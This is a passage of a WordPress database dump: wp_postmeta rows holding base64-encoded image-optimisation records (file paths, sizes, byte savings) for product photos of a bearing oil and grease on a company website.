wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMDY1LCJ0aW1lIjoxNDgzNTc4Mzc5LCJpZCI6MTAyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6Mzg5LCJ0aW1lIjoxNDgzNTc4MzgyLCJpZCI6MTAyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDA4LCJ0aW1lIjoxNDgzNTc4Mzg2LCJpZCI6MTAyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6Mzg3LCJ0aW1lIjoxNDgzNTc4Mzg5LCJpZCI6MTAyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NDM2LCJ0aW1lIjoxNDgzNTc4MzkyLCJpZCI6MTAyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTA0LCJ0aW1lIjoxNDgzNTc4Mzk2LCJpZCI6MTAyNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NTc0LCJ0aW1lIjoxNDgzNTc4Mzk5LCJpZCI6MTAyNH1d'); 
INSERT INTO `wp_postmeta` VALUES (29838, 1023, 'wpfc_optimisation_reduction', '13812'); 
INSERT INTO `wp_postmeta` VALUES (29839, 1023, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi5qcGciLCJ3aWR0aCI6NDI1NiwiaGVpZ2h0IjoyODMyLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTc4NDA0LCJpZCI6IjEwMjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzIwLCJ0aW1lIjoxNDgzNTc4NDA4LCJpZCI6MTAyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTgwMHg1MzIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItODAweDUzMi5qcGciLCJyZWR1Y3Rpb24iOjEzMTAsInRpbWUiOjE0ODM1Nzg0MTIsImlkIjoxMDIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItNzY4eDUxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi03Njh4NTExLmpwZyIsInJlZHVjdGlvbiI6MTMyOCwidGltZSI6MTQ4MzU3ODQxNiwiaWQiOjEwMjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMTYwMHgxMDY1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMTYwMHgxMDY1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTE2MDB4MTA2NS5qcGciLCJyZWR1Y3Rpb24iOjMyNDUsInRpbWUiOjE0ODM1Nzg0MjEsImlkIjoxMDIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjI5LCJ0aW1lIjoxNDgzNTc4NDI1LCJpZCI6MTAyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUwNSwidGltZSI6MTQ4MzU3ODQyOCwiaWQiOjEwMjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1ODEsInRpbWUiOjE0ODM1Nzg0MzEsImlkIjoxMDIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6OTY5LCJ0aW1lIjoxNDgzNTc4NDM1LCJpZCI6MTAyM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NTE4LCJ0aW1lIjoxNDgzNTc4NDM5LCJpZCI6MTAyM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NTY3LCJ0aW1lIjoxNDgzNTc4NDQyLCJpZCI6MTAyM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NjE2LCJ0aW1lIjoxNDgzNTc4NDQ1LCJpZCI6MTAyM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODA4LCJ0aW1lIjoxNDgzNTc4NDQ5LCJpZCI6MTAyM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTUzLCJ0aW1lIjoxNDgzNTc4NDUzLCJpZCI6MTAyM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UyLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZTItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlMi00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTA2MywidGltZSI6MTQ4MzU3ODQ1NiwiaWQiOjEwMjN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29840, 1022, 'wpfc_optimisation_reduction', '11665'); 
INSERT INTO `wp_postmeta` VALUES (29841, 1022, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xLmpwZyIsIndpZHRoIjo0MjU2LCJoZWlnaHQiOjI4MzIsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1Nzg0NjEsImlkIjoiMTAyMiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1ODgsInRpbWUiOjE0ODM1Nzg0NjUsImlkIjoxMDIyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMS04MDB4NTMyLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMS04MDB4NTMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMS04MDB4NTMyLmpwZyIsInJlZHVjdGlvbiI6MTAwMSwidGltZSI6MTQ4MzU3ODQ2OSwiaWQiOjEwMjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xLTc2OHg1MTEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0xLTc2OHg1MTEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmM